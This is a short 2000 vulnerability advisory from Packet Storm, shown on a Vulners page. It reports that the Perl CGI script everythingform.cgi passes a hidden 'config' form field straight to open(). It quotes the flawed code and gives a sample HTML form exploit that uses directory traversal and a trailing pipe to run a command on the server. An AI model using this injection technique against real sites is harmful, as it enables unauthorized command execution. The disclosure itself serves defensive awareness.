Lucene search

K

rpc-everythingform.txt

🗓️ 19 Dec 2000 00:00:00Reported by RPCType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Hidden field usage in Perl script exposes configuration data, leading to potential exploits.

Show more
Code
`Hi All,  
  
This is Yet Another Bad Perl Script. everythingform.cgi uses a hidden field  
'config' to determine where to read configuration data from.  
  
--code snippit--  
..  
$ConfigFile = $in{config};  
..  
open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in  
the ReadConfig subroutine. Reason: $!");  
------------  
  
Information regarding everythingform can be found at:  
http://www.conservatives.net/atheist/scripts/index.html?everythingform  
  
Sample exploit:  
  
<form action="http://www.conservatives.net/someplace/everythingform.cgi"  
method=POST>  
<h1>everythingform.cgi exploit</h1>  
Command: <input type=text name=config value="../../../../../../../../bin/ping  
-c 5 www.foobar.com|">  
<input type=hidden name=Name value="fuck the religious right">  
<input type=hidden name="e-mail" value="[email protected]">  
<input type=hidden name=FavoriteColor value=Black>  
<input type=submit value=run>  
</form>  
  
  
--rpc  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
19 Dec 2000 00:00Current
7.4High risk
Vulners AI Score7.4
21
.json
Report